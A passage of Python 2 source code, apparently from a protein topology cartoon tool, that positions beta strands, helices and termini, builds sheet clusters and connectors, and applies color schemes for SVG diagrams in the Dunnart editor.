strand_num - Starts at 0 for first strand drawn in sheet.
Needed since vert alignment is relative
to first_horiz_indguide_xmlid which is for first
strand so avoid redundant indguide/align to this
on first strand only.
Also used to place the separation constraint
handles for each sheet at slighly different
positions.
sheet_start_pos - For 'sideways' sheets, y, else x position
of start of sheet (first strand).
Used for placing the separation constraint
handles for relative strand offsets.
enable_offset_align_constraint - Boolean: if True write
strand offset ('vertical' alignment constraint
(for position 'up or down' along neighbour strand)
else don't write the constraint.
label_residue_numbers - Boolean: if True put start and end
residue ids on start and end of strand shape
Uses data members:
xmlid_generator
Return value:
the ypos of the strand just written
(or xpos if sideways)
"""
assert(isinstance(node, PTNodeStrand))
# NOTE: horiz/vert and x/y and height/width
# names may be somewhat confusing in
# here now since sideways strands reverse the meanings of these
# things... (i.e. height is actually width, 'horiz_indguides' are
# vertical, etc. variable names and comments assume up/down
# (i.e. not sideways)
if sse_label_scheme == 'sequential':
label = str(seqnum_dict[node.nodeid])
elif sse_label_scheme == 'separate':
label = str(node.seqnum)
if self.num_chains() > 1:
label = label + str(node.get_chainid()).lower()
else:
label = ''
# mark 'edges' of barrel (the strands on end where brdige broken to
# 'flatten' them) by putting an asterisk on the label
# (TODO: some better way of markign this, color or something?)
if node.get_barrel_edge():
label += '*'
strand_xmlid = self.xmlid_generator.next()
if node.get_sideways():
strand_ypos = ypos
strand_xpos = xpos + node.get_align_pos() * DUNNART_SPAN_LENGTH_FACTOR
else:
strand_xpos = xpos
strand_ypos = ypos + node.get_align_pos() * DUNNART_SPAN_LENGTH_FACTOR
node.set_svginfo(strand_xmlid, strand_xpos, strand_ypos, label,
vert_indguide,
str(seqnum_dict[node.nodeid]))
if label_residue_numbers:
node.headLabel = node.resid_list[-1]
node.tailLabel = node.resid_list[0]
# align strands in vert_list on vertical alignment indguide
if node.get_sideways():
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(vert_indguide, node, align_type))
if strand_num > 0: # not the first strand in sheet
# write an indguide for this strand to be used
# for separation constraints which enforce the position
# i.e. the align_pos
if node.get_sideways():
direction = DUNNART_GUIDE_TYPE_VERT
pos = strand_xpos
else:
direction = DUNNART_GUIDE_TYPE_HORI
pos = strand_ypos
xmlid = self.xmlid_generator.next()
this_horiz_indguide = PTSVGIndGuide(xmlid, pos, direction)
self.svg_constraint_list.append(this_horiz_indguide)
else:
this_horiz_indguide = first_horiz_indguide
# and align this strand on it, if parameter set to allow this
if enable_offset_align_constraint:
if node.get_sideways():
alignment_pos = DUNNART_ALIGN_LEFT
else:
alignment_pos = DUNNART_ALIGN_TOP
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(this_horiz_indguide, node,
alignment_pos))
if strand_num > 0: # not the first strand in sheet
# write separation constraint between horiz indguide of first strand
# (base for all offsets) and this horiz indguide.
sephandle_pos = sheet_start_pos - strand_num * 5
xmlid = self.xmlid_generator.next()
sep = PTSVGDistribution(
xmlid, direction,
str(node.get_align_pos()*DUNNART_SPAN_LENGTH_FACTOR),
sephandle_pos)
self.svg_constraint_list.append(sep)
self.svg_constraint_list.append(
PTSVGDistroConstraint(first_horiz_indguide,
this_horiz_indguide,
sep))
if node.get_sideways():
strand_pos = strand_xpos
else:
strand_pos = strand_ypos
return strand_pos
def set_helix_svginfo(self, helix, xpos, ypos,
sse_label_scheme,
seqnum_dict, label_residue_numbers):
"""
Set the SVG info for a helix node. called by build_dunnart_svg().
Parameters:
helix - PTSVGNodeHelix to set info in
xpos - x coorindate to write helix
ypos - y coordinate to write helix
sse_label_scheme - if 'sequential' number all SSEs sequentially
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
include_pi_helices,include_310_helices - flag to use these or not
(NOTE: sets is_positioned flag and svg info in helix nodes though)
xmlid_generator
Return value:
None
"""
assert isinstance(helix, PTSVGNodeHelix)
if ( (helix.get_type() == "310" and not self.include_310_helices) or
(helix.get_type() == "PI" and not self.include_pi_helices) ):
return
if sse_label_scheme == 'sequential':
label = str(seqnum_dict[helix.nodeid])
elif sse_label_scheme == 'separate':
# helices are labelled 'A', 'B', etc. by convention
# FIXME: should go to AA, AB, etc. if more than 26
label = chr(ord('A')-1 + helix.seqnum)
if self.num_chains() > 1:
label = label + str(helix.get_chainid()).lower()
else:
label = ''
xmlid = self.xmlid_generator.next()
helix.set_svginfo(xmlid, xpos, ypos, label,
str(seqnum_dict[helix.nodeid]))
if label_residue_numbers:
helix.headLabel = helix.resid_list[-1]
helix.tailLabel = helix.resid_list[0]
helix.set_is_positioned(True)
def get_most_nterm_visible_sse(self, nodelist):
"""
Return the most N-terminal already placed SSE (helix or strand)
in the supplied nodelist (ordered from N to C terminus).
Only used when distance matrix placement is being used, depends
on the is_positioned flag in PTNode being set.
Parameters:
nodelist - list of PTNodes ordererd from N- to C-terminus.
Retrun value:
PTNode that is most N-terminal which is already positioned
or None if none found (should not happen)
"""
i = 1 # start at second in nodelist, first is N-terminal pseudonode
while i < len(nodelist) and not nodelist[i].get_is_positioned():
i += 1
if i < len(nodelist):
return nodelist[i]
else:
return None
def get_most_cterm_visible_sse(self, nodelist):
"""
Return the most C-terminal already placed SSE (helix or strand)
in the supplied nodelist (ordered from N to C terminus).
Only used when distance matrix placement is being used, depends
on the is_positioned flag in PTNode being set.
Parameters:
nodelist - list of PTNodes ordererd from N- to C-terminus.
Retrun value:
PTNode that is most C-terminal which is already positioned
or None if none found (should not happen)
"""
# start at second-last in nodelist, last is C-terminal pseudonode
i = len(nodelist) - 2
while i > 0 and not nodelist[i].get_is_positioned():
i -= 1
if i > 0:
return nodelist[i]
else:
return None
def build_termini_svg(self, interdomain_connectors=False):
"""
Build SVG all the N- and C- terminus nodes (may be multiple for multi
chains, and 'pseudo' terminus nodes for breaks in chain due to
domain decomposition).
Parameters:
terminus - PTNodeTerminus to write
interdomain_connectors - If True, do NOT make
pseduo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left ot hve connectors to other domain
added later. Default False.
Uses data members (readonly):
chain_dict - dict of chainid : node_list
Return value:
None
"""
# since node list for each chain is sorted by PDB residue sequence
# number (ascending), the N terminal node is the first and the
# C terminal is the last.
for nodelist in self.iter_chains():
# position terminus symbol near corresponding
# most N- or C- terminal element
for term_node in [nodelist[0], nodelist[-1]]: # N-term, C-term
# build all (include pseudo) terminus nodes if not using
# interdomain connectors, and (even if we are using
# interdomain conenctors), always build non-psuedo termini
if (not interdomain_connectors or not term_node.get_pseudo()):
(xpos, ypos) = self.find_terminus_pos(term_node,
nodelist)
# TODO: align on strand alignment indguide
self.set_terminus_svginfo(term_node, xpos, ypos)
def find_terminus_pos(self, term_node, nodelist):
"""
Find the position to place the supplied (N- or C-) terminus node,
byt finding the nearest in sequence visible SSE and returning
a position nearby.
Parameters:
term_node - PTNodeTerminus to write
nodelist - list of PTNodes in this chain (containing term_node)
Return value:
(xpos, ypos) tuple to place terminus at.
"""
assert(isinstance(term_node, PTNodeTerminus))
if term_node.get_termtype() == 'N':
is_n_term = True
else:
is_n_term = False
if is_n_term:
nearest_sse = self.get_most_nterm_visible_sse(nodelist)
else: # c-term
nearest_sse = self.get_most_cterm_visible_sse(nodelist)
xpos = nearest_sse.xpos
ypos = nearest_sse.ypos
if ( (is_n_term and nearest_sse.get_reversed()) or
(not is_n_term and not nearest_sse.get_reversed()) ):
if nearest_sse.get_sideways():
xpos -= get_min_gap_size()
else:
ypos -= get_min_gap_size()
else:
if isinstance(nearest_sse, PTNodeStrand):
span_length_factor = DUNNART_SPAN_LENGTH_FACTOR
else:
span_length_factor = DUNNART_HELIX_SPAN_FACTOR
offset = nearest_sse.get_span() * span_length_factor + \
get_min_gap_size()
if nearest_sse.get_sideways():
xpos += offset
else:
ypos += offset
return (xpos, ypos)
def set_terminus_svginfo(self, terminus, xpos, ypos):
"""
Set the SVG infor for a N- or C- terminus node.
Parameters:
terminus - PTNodeTerminus to write
xpos - x coorindate to write at
ypos - y coordinate to write at
Uses data members (readonly):
node_list - ordered list of nodes
xmlid_generator
Return value:
None
"""
assert isinstance(terminus, PTSVGNodeTerminus)
xmlid = self.xmlid_generator.next()
label = terminus.nodeid # 'C' or 'N' or 'Ca' etc.
terminus.set_svginfo(xmlid, xpos, ypos, label)
terminus.set_is_positioned(True)
def build_sheet_cluster_constraints_svg(self,
sheet_shading_colors):
"""
Build cluster constraints for grouping
strands into sheets. Called by build_dunanrt_svg().
Parameters:
sheet_shading_colors - None (use default shade for all) or
'auto' (use color gradient to shade each
differently) or list of colors.
Uses data members (readonly):
node_list - ordered list of nodes
(write):
sheet_cluster_list - list of SVGCluster objects, appended to here.
xmlid_generator
Return value:
None
"""
num_sheets = len(list(self.sheet_dict.iteritems()))
if num_sheets < 1:
return
if (sheet_shading_colors):
cluster_fill_colors = get_cluster_fill_colors(sheet_shading_colors,
num_sheets)
i = 0
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
if (sheet_shading_colors):
cluster_fill_color = cluster_fill_colors[i]
else:
cluster_fill_color = DUNNART_DEFAULT_CLUSTER_FILL_COLOR
self.sheet_cluster_list.append(PTSVGCluster(
ptnode_list,
self.xmlid_generator.next(),
sheet_id,
0,
cluster_fill_color))
i += 1
def build_connectors_svg(self, nodelist,
chain_i,
use_connector_arrowheads=False,
connector_color_scheme = 'all',
interdomain_connectors = False):
"""
Called by build_dunnart_svg() to
build SVG for connectors for sequence in a single chain:
a connector between each
node (helix/strand) in sequence order.
This new version is for use with the -i (distance matrix instead
of heuristic helix placement) option i.e. the greedy placement
algorithm. It places connectors on ports of helices in the same
way as strands, i.e. using their orientation ('reversed' flag)
as set by tableau information.
Parameters:
nodelist - list of nodes in this chain
chain_i - chain index (0,1,...) for selecting line color
use_connector_arrowheads - If True make connectors directed.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
interdomain_connectors - If True, do NOT make
pseduo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left ot hve connectors to other domain
added later. Default False.
Uses data members (readonly):
node_list - ordered list of nodes (NB sets port fields in SVGNodes)
include_pi_helices, include_310_helices
xmlid_generator
Return value:
None
Precondition: nodelist is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
prevnode = None
for nodeindex in range(len(nodelist)):
node = nodelist[nodeindex]
if ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
continue # skip pi/310 helix if flagged to do so
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and node.get_pseudo() ):
continue # don't do pseudo for interdomain
if prevnode != None:
# add connector from prevnode to node
if isinstance(prevnode, PTNodeTerminus):
srcFlags = DUNNART_DEFAULT_PORT
else:
src_reversed = prevnode.get_reversed()
if src_reversed:
srcFlags = DUNNART_BOTTOM_PORT
else:
srcFlags = DUNNART_TOP_PORT
if prevnode.get_sideways():
if srcFlags == DUNNART_TOP_PORT:
srcFlags = DUNNART_LEFT_PORT
else:
srcFlags = DUNNART_RIGHT_PORT
if isinstance(node, PTNodeTerminus):
dstFlags = DUNNART_DEFAULT_PORT
else:
dst_reversed = node.get_reversed()
if dst_reversed:
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
if node.get_sideways():
if dstFlags == DUNNART_TOP_PORT:
dstFlags = DUNNART_LEFT_PORT
else:
dstFlags = DUNNART_RIGHT_PORT
# line color may be overwritten later for multidomain
linecolor = get_line_color(connector_color_scheme, chain_i)
node.nterm_port = dstFlags
prevnode.cterm_port = srcFlags
xmlid = self.xmlid_generator.next()
self.svg_connector_list.append(
PTSVGConnector(xmlid, prevnode, node, srcFlags, dstFlags,
linecolor, use_connector_arrowheads))
prevnode = node
def dfs_strands_seq(self, start_strand, visited, dfs_list, from_node,
component_id=None):
"""
Make a depth-first search traversal of STRAND nodes
using sequence (not bridge)
edges starting at the specfied strand,
returning list of (node,from_node) tuples in DFS traversal order
where from_node is the node from which node is reached.
Note these sequence 'edges' are simply implied by the order of
nodes in list: a node has a sequene edge to the ones immediately
before and after it in sequence along chain from N to C terminus.
Parameters:
start_strand - STRAND node to start at
visited - (in/out) dictionary of {ptnode:True} visited nodes
dfs_list - (in/out) list of (node, from_node) visited in dfs order
from_node - node from which we are being (recursively) called
component_id - identifier of this connected component to mark
each strand in it with, or None to not mark at all
(default).
Recursive function. call initially as
dfslist = []
dfs_strands_from(startnode, {}, dfslist, None)
Return value:
None. (output is dfs_list parameter)
"""
visited[start_strand] = True
if component_id != None:
start_strand.set_seq_component_id(component_id)
dfs_list.append((start_strand,from_node))
# get list of strands (can only be max 2) adjacent in sequence
# to this one and in the same sheet
sequence_adjacent_nodes = []
chainid = start_strand.get_chainid()
sheetid = start_strand.get_sheet_id()
nodelist = self.chain_dict[chainid]
indx = nodelist.index(start_strand)
if (indx > 1 and isinstance(nodelist[indx-1], PTNodeStrand) and
nodelist[indx-1].get_sheet_id() == sheetid):
sequence_adjacent_nodes.append(nodelist[indx-1])
if (indx < len(nodelist)-2 and
isinstance(nodelist[indx+1], PTNodeStrand) and
nodelist[indx+1].get_sheet_id() == sheetid):
sequence_adjacent_nodes.append(nodelist[indx+1])
for node in sequence_adjacent_nodes:
if node not in visited:
self.dfs_strands_seq(node, visited, dfs_list, start_strand,
component_id)
def find_connected_components_seq_sheet(self):
"""
Find the connected components (considering only STRAND nodes
and sequence [not brdige] edges each sheet).
This is done by a DFS traversal at every strand in the sheet
(skipping already visited ones), giving us the partition of
the graph of strand nodes in sheet into connected components.
Used by set_sheet_fold_color() to color strands in sheet
in componenets where those adjacent in sequence are colored the
same.
Parameters: None
Return value: the number of components labelled
Uses member data:
sheet_dict - dict of {sheet_id : ptnode_list} represneting sheets
chain_dict - dict by chainid of list
of PTNodes in the graph (modifies PTNodes not list)
(WRITE):
Labels each strand node with the sheet connected component
id it belongs to as it goes, starting from 0.
"""
component_id = 0
visited = {} # dictionary of {ptnode : True} visited nodes
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
for node in ptnode_list:
if node not in visited:
connected_node_list = []
self.dfs_strands_seq(node,visited,connected_node_list,None,
component_id)
component_id += 1
return component_id
def set_sheet_fold_color(self):
"""
Set the colors of starnds in sheets for the 'fold' color scheme.
For each sheet colors strands that are connected only by
turns (i.e. are consecutive in sequence) one color (maybe more
than one set of such conseuctive strands in sheet, a different
color for each such set), and other strands (i.e. not in a sequence)
another color(s).
Parameters: None
Return value: None
Uses data members:
nodelist, chain_dict, sheet_dict etc.
Modifies nodes by set_color_hex() or set_color() methods
"""
num_components = self.find_connected_components_seq_sheet()
if num_components == 0:
return
# get list of contrasting colors
# see Glasbey et al 2007
color_list = get_glasbey_colors_rgb()
if len(color_list) < num_components:
sys.stderr.write('WARNING: not enough colors in high contrast list')
for (sheet_id, strandlist) in self.sheet_dict.iteritems():
for strand in strandlist:
strand.set_color(color_list[strand.get_seq_component_id() % len(color_list)])
def set_nodelist_colorslist(self, type_color_dict, typekey):
"""
Utility function used by set_node_colors() to set all the nodes
in the nodelist, that are all of the same type, with the color
list from from type_color_dict of type typekey, which correpsonds to the
type of nodes in nodelist (310 helix, pi helix, alpha helix).
Nodes are colored in order of the colors in the list for the
corresponding type. If they run out (more elements than
colors in list, the list is treated as circular, ie colors
reused from the start of list again). If no colors for that
type, DEFAULT_SHAPE_COLOR_HEXSTR is used.
Parameters:
type_color_dict - dict { type : color_list } where type is
'sheet','helixcluster',
'alpha','pi' or '310' and color_list is list
of color value strings where the color
value strings are 'rrggbb' color strings,
as returned by get_simple_colors()
typekey - key to type_color_dict ie 'alpha', 'pi' etc
Uses data members:
Sets values in nodes in nodelist accessed via iter_helices()
"""
if type_color_dict.has_key(typekey):
color_list = type_color_dict[typekey]
else:
color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
node_i = 0
for node in [n for n in self.iter_helices() if
n.get_type() == typekey.upper()]:
node.set_color_hex(color_list[node_i % len(color_list)])
node_i += 1
def set_node_colors(self, color_scheme):
"""
Set the color tuple in each node with a color in a gradient
from blue at the N terminal to red at the C terminal in each
chain.
Parameters:
color_scheme: string, one of the following:
'none' : set each shape to default color
'simple' : set strands in sheets from one list of colors,
helices in clusters (if any) to a 2nd list of colors,
alpha, pi and 310 helices each from their own
lists of colors.
'gradient' : color from blue to red
along sequence from N to C terminus.
'sheet' : color the strands in each sheet a different
color (leaving helices default color)
'fold' : color consecutive sequence strands in sheet
one color, others another.
Return value: None
Uses data members:
nodelist, chaindict, sheet_dict etc. (via iter_ functions)
Modifies nodes by set_color_hex() or set_color() methods
Raises Exceptions:
ValueError for unknown color_scheme
"""
if color_scheme[:6] == 'simple':
type_color_dict = get_simple_colors(color_scheme)
# first do helices
self.set_nodelist_colorslist(type_color_dict, "alpha")
if self.include_310_helices:
self.set_nodelist_colorslist(type_color_dict, "310")
if self.include_pi_helices:
self.set_nodelist_colorslist(type_color_dict, "pi")
# NB if helix is part of a cluster, will be
# overwritten in build_helices_heuristic()
# if helix clustering is enabled
# now do strands in sheets
if type_color_dict.has_key('sheet'):
sheet_color_list = type_color_dict['sheet']
else:
sheet_color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
sheet_i = 0
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
for strand in ptnode_list:
assert(isinstance(strand, PTNodeStrand))
strand.set_color_hex(
sheet_color_list[sheet_i % len(sheet_color_list)] )
sheet_i += 1
# and termini
if type_color_dict.has_key('terminus'):
color_list = type_color_dict['terminus']
else:
color_list = [DEFAULT_SHAPE_COLOR_HEXSTR]
node_i = 0
for node in [n for n in self.iter_nodes() if
isinstance(n, PTNodeTerminus)]:
node.set_color_hex(color_list[node_i % len(color_list)])
node_i += 1
else:
done_color = False # used for things that don't need per-chain code
for nodelist in self.iter_chains():
# local_nodelist omits pi and/or 310 helices if we are not to
# draw them
local_nodelist = [ node for node in nodelist if
not ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) )
]
if color_scheme == 'gradient':
rgb_list = list(color_gradient(len(local_nodelist)))
assert(len(rgb_list) == len(local_nodelist))
for i in range(len(local_nodelist)):
local_nodelist[i].set_color(rgb_list[i])
i += 1
elif color_scheme == 'sheet':
if not done_color:
num_sheets = len(list(self.sheet_dict.iteritems()))
# set up list of strand colors, one per sheet, by using
# the color gradient to ensure all sheets have different
# color.
if num_sheets > 0:
sheet_colors = [ rgb for rgb in color_gradient(num_sheets) ]
i = 0
for (sheet_id, ptnode_list) in self.sheet_dict.iteritems():
for strand in ptnode_list:
assert(isinstance(strand, PTNodeStrand))
strand.set_color(sheet_colors[i])
i += 1
done_color = True
# set all helices and termini to default color
for node in local_nodelist:
if not isinstance(node, PTNodeStrand):
node.set_color_hex(DEFAULT_SHAPE_COLOR_HEXSTR)
elif color_scheme == 'fold':
if not done_color:
self.set_sheet_fold_color()
done_color = True
# set all helices and termini to default color
for node in local_nodelist:
if not isinstance(node, PTNodeStrand):
node.set_color_hex(DEFAULT_SHAPE_COLOR_HEXSTR)
elif color_scheme == 'none':
for node in local_nodelist:
node.set_color_hex(DEFAULT_SHAPE_COLOR_HEXSTR)
else:
raise ValueError('unknown color scheme ' + color_scheme)
##########################################################################
#
# functions for heuristic helix placement etc. used when
# not using the -i option
#
def build_interstrand_helices_svg(self, sheet_pos_dict,
sse_label_scheme,
seqnum_dict,
label_residue_numbers):
"""
Build SVG helices that match the special case of being between
two strands in the same vertilist of a sheet. We draw these
beside the relevant sheet insead of along strands axis to
make diagram much neater. See e.g. 2QP2-1 (using STRIDE and DDOMAIN).
Called by build_dunnart_svg()
Parameters:
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-orindate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of sepearte sequences for strands and helices.
Note that this does not affect internal number, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
ptrelpos -
PTRelativePosition instance, to get strand positions
node_list - ordered list of nodes
(NOTE: sets is_positioned,is_interstrand flags in helices though)
Return value:
None
"""
for nodelist in self.iter_chains():
helix_index = 0
while helix_index < len(nodelist):
helix = nodelist[helix_index]
if not isinstance(helix, PTNodeHelix):
helix_index += 1
continue # only helices handled here
(sheet_id, nterm_strand_index, cterm_strand_index) = \
self.immediate_containing_sheet(helix_index, helix.get_chainid())
if (sheet_id == None or nterm_strand_index == None or
cterm_strand_index == None):
helix_index += 1
continue # not between strands in same sheet
nterm_strand = nodelist[nterm_strand_index]
cterm_strand = nodelist[cterm_strand_index]
sheet_id = nterm_strand.get_sheet_id()
assert(sheet_id == cterm_strand.get_sheet_id())
nterm_strand_posnum = \
self.ptrelpos.get_strand_posnum(nterm_strand)
cterm_strand_posnum = \
self.ptrelpos.get_strand_posnum(cterm_strand)
if (nterm_strand_posnum == cterm_strand_posnum):
# this helix is between two strands in alignment in sheet,
# draw it beside sheet
if verbose:
sys.stderr.write('interstrand helices: helix '
+str(helix) +
' between strands ' +
str(nterm_strand) + ','
+ str(cterm_strand) + '\n')
helix.set_is_interstrand(True)
helix.set_reversed(nterm_strand.get_reversed())
helix.set_sideways(nterm_strand.get_sideways())
if (nterm_strand_posnum >
len(self.sheet_strandlists_dict[sheet_id])/2):
relpos = RELPOS_RIGHT
else:
relpos = RELPOS_LEFT
if nterm_strand.get_sideways():
if relpos == RELPOS_RIGHT:
relpos = RELPOS_BELOW
else:
relpos = RELPOS_ABOVE
(xpos, ypos) = self.relpos_to_pos(sheet_id,
helix,
relpos,
nterm_strand,
None,
sheet_pos_dict)
self.set_helix_svginfo(helix,
xpos, ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
helix_index += 1
def immediate_containing_sheet(self, node_index, chainid):
"""
Return the sheet id of of sheet 'immediately containing' the supplied
node. This is the sheet that the supplied node
(usually a helix) 'interrupts', i.e. if the node is between
two strands of the same sheet, return the id of that sheet.
Returns None if there is no such sheet, e.g. if the node
is between two strands which are not in the same sheet.
Also returns the index in the node_list of the strands found
before and after the supplied node (one or both may be None)
that were used to determine the sheet.
This is done simply by checking forward (towards C-terminal) and
backward (towards N-terminal) from the node until a strand is
found, and returning the sheet id of the strands if they are the
from the same sheet. (Note this means that if the node to test
is a strand in a sheet, then that sheet id will be returned, though
this isn't the useful case of this function).
Parameters:
node_index - index in the node list of the
PTNode to find immediate contianing sheet for.
chainid - chainid of the node, this is the key of chain_dict
to get the nodelist that node_index is an index of.
Return value:
tuple (sheet_id, nterm_strand_index, cterm_strand_index)
where the cterm_ and nterm_ strand indices are the indices
in the node_list of the strands in the N- and C- terminal
directions that were used to determine the sheet_id.
Any (or all) of these may be None.
Uses data members (readonly):
chain_dict - dict by chainid of ordered list of PTNodes
"""
nodelist = self.chain_dict[chainid]
# find first strand towards N-terminal
nterm_strand = None
nterm_strand_index = None
for i in range(node_index - 1, -1, -1):
if isinstance(nodelist[i], PTNodeStrand):
nterm_strand_index = i
nterm_strand = nodelist[i]
break
# find first strand towards C-terminal
cterm_strand = None
cterm_strand_index = None
for i in range(node_index + 1, len(nodelist)):
if isinstance(nodelist[i], PTNodeStrand):
cterm_strand_index = i
cterm_strand = nodelist[i]
break
if cterm_strand != None and nterm_strand != None:
if nterm_strand.get_sheet_id() == cterm_strand.get_sheet_id():
return (nterm_strand.get_sheet_id(), nterm_strand_index,
cterm_strand_index)
return (None, nterm_strand_index, cterm_strand_index)
def count_helices_on_strand_axis(self, strand, strand_pos_dict):
"""
Count the number of helices above and below (or left and right of)
the supplied strand. Called by build_helices_svg()
and room_for_helix_cluster().
Parameters:
strand - PTNodeStrand of strand to count helices in alignement
strand_pos_dict - The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
Return value:
tuple (num_above, num_below) where num_above is number of helices
above (or left of) strand on same axis, and num_below is the number
below (or right of) strand on same axis.
Uses data members: None
"""
(ypos_above_unused, ypos_below_unused, sideways,
num_helices_aligned_above_strand,
num_helices_aligned_below_strand) = \
strand_pos_dict[strand.nodeid]
return (num_helices_aligned_above_strand,
num_helices_aligned_below_strand)
# xpos = strand.xpos
# ypos = strand.ypos
# if sideways:
# alignpos = ypos
# slidepos = xpos
# else:
# alignpos = xpos
# slidepos = ypos
# num_above = 0
# num_below = 0
# for node in self.iter_nodes():
# nodeid = node.nodeid
# xpos = node.xpos
# ypos = node.ypos
# if sideways:
# testpos = ypos
# testslidepos = xpos
# else:
# testpos = xpos
# testslidepos = ypos
# if (testpos == alignpos and
# isinstance(node, PTNodeHelix)):
# if testslidepos < slidepos:
# num_above += 1
# else:
# num_below += 1
# return (num_above, num_below)
def room_for_helix_cluster(self, seq_strand, seqpos,
strand_pos_dict):
"""
Return True if there would be room to place the helix cluster
before/after (seqpos) the seq_strand. Else False.
Checks for helices aligned on strand axes on the same side of the
sheet as the cluster would be aligned. If there are any then
we decide that the helix cluster may not fit there.
Called by build_helices_svg().
Parameters:
seq_strand - PTNodeStrand of strand the helix cluster would
be aligned (by its first helix) to
seqpos - SEQPOS_AFTER or _BEFORE the seq_strand
strand_pos_dict - The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
Return value:
True if there would be room to place the helix cluster
before/after (seqpos) the seq_strand. Else False.
Uses data members:
sheet_strandlists_dict - the dictionary (by sheet id)
of list of lists built by
build_constraints()
"""
sheetid = seq_strand.get_sheet_id()
if ( (seq_strand.get_reversed() and seqpos == SEQPOS_AFTER) or
(not seq_strand.get_reversed() and seqpos == SEQPOS_BEFORE) ):
cluster_relpos = RELPOS_BELOW
else:
cluster_relpos = RELPOS_ABOVE
# print 'ddddd',sheetid,ptrelpos_to_str(cluster_relpos)
helices_found = 0
for vertlist in self.sheet_strandlists_dict[sheetid]:
for strand in vertlist: # FIXME: should not need all in vertlist
(num_helices_above_strand,
num_helices_below_strand) = \
self.count_helices_on_strand_axis(strand,
strand_pos_dict)
# print 'fff',strand,num_helices_above_strand,num_helices_below_strand
if cluster_relpos == RELPOS_BELOW:
helices_found += num_helices_below_strand
else:
helices_found += num_helices_above_strand
if helices_found > 0:
# print 'eeeee',helices_found
return False
return True
def helix_is_sheet_gap(self, helix, nterm_strand, cterm_strand, seqpos,
seq_strand, sheet_posmap,
is_helix_cluster=False):
"""
Return True if the supplied helix would be undesirably forcing
a gap between sheets when placed on the axis using the
build_helices_svg () method. That is, if it is to be
positioned on an axis whic is between two sheets that have
been placed next to each other.
Note we do NOT return True if the helix is actually in sequence
between strands in each of the sheets, and those strands have
the same direction, then we DO want to place
it between them, UNLESS the helix is part of a cluster, then
we still don't.
Parameters:
helix - PTNodeHelix to test
nterm_strand - next strand along chain in N-terminal direction
cterm_strand - next strand along chain in C-terminal direction
seqpos - SEQPOS_AFTER or _BEFORE as calculted in build_helices_svg()
seq_strand - the PTNode strand whose axis the helix would be placed
on. Must be one of nterm_strand or cterm_strand
sheet_posmap - the PTPosMap of sheet positionings
is_helix_cluster - the helix is part of a helix cluster
default False
Retrun value:
True if we do not want to position the helix on the axis as we
normally would, False otherwise.
"""
assert(seq_strand != None)
assert(seq_strand == nterm_strand or seq_strand == cterm_strand)
assert(seqpos == SEQPOS_AFTER or seqpos == SEQPOS_BEFORE)
sheet_id = seq_strand.get_sheet_id()
if cterm_strand != None and cterm_strand != seq_strand:
other_sheet_id = cterm_strand.get_sheet_id()
elif nterm_strand != None and nterm_strand != seq_strand:
other_sheet_id = nterm_strand.get_sheet_id()
else:
other_sheet_id = None
sideways = seq_strand.get_sideways()
if sideways:
if seqpos == SEQPOS_AFTER:
direction = RELPOS_LEFT
else:
direction = RELPOS_RIGHT
else:
if seqpos == SEQPOS_AFTER:
direction = RELPOS_ABOVE
else:
direction = RELPOS_BELOW
try:
sheet_neighbours = sheet_posmap[sheet_id]
# print 'yyyy',sheet_id,':',str(sheet_neighbours),sideways,ptrelpos_to_str(direction)
except KeyError:
return False # no neighbouring sheets
neighbour_sheet_id = sheet_neighbours.get_neighbour(direction)
if neighbour_sheet_id == None:
return False # no neighbour sheet in this direction
if (neighbour_sheet_id == other_sheet_id and
nterm_strand.get_sideways() == cterm_strand.get_sideways() and
nterm_strand.get_reversed() == cterm_strand.get_reversed() and
not is_helix_cluster):
return False # in seq between same direction strands in each sheet
else:
if verbose:
sys.stderr.write('helix_is_sheet_gap: ' + str(helix) +
' between sheet ' + sheet_id + ' and sheet ' +
neighbour_sheet_id + '\n')
return True
def find_helix_xypos(self, helix, seq_strand, sheet_posmap,
sheet_pos_dict,
enable_sheet_gap_rule):
"""
Get position the helix near the sheet seq_strand is in
according to position map for relative position and tableau
for orientation
Parameters:
helix - PTNode helix to get position for
seq_strand - strand that the helix is in sequence next to
sheet_posmap - The PTPosMap of sheet neighbour relationships
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-orindate:
{ sheet_id : (top_ypos, bottom_ypos,
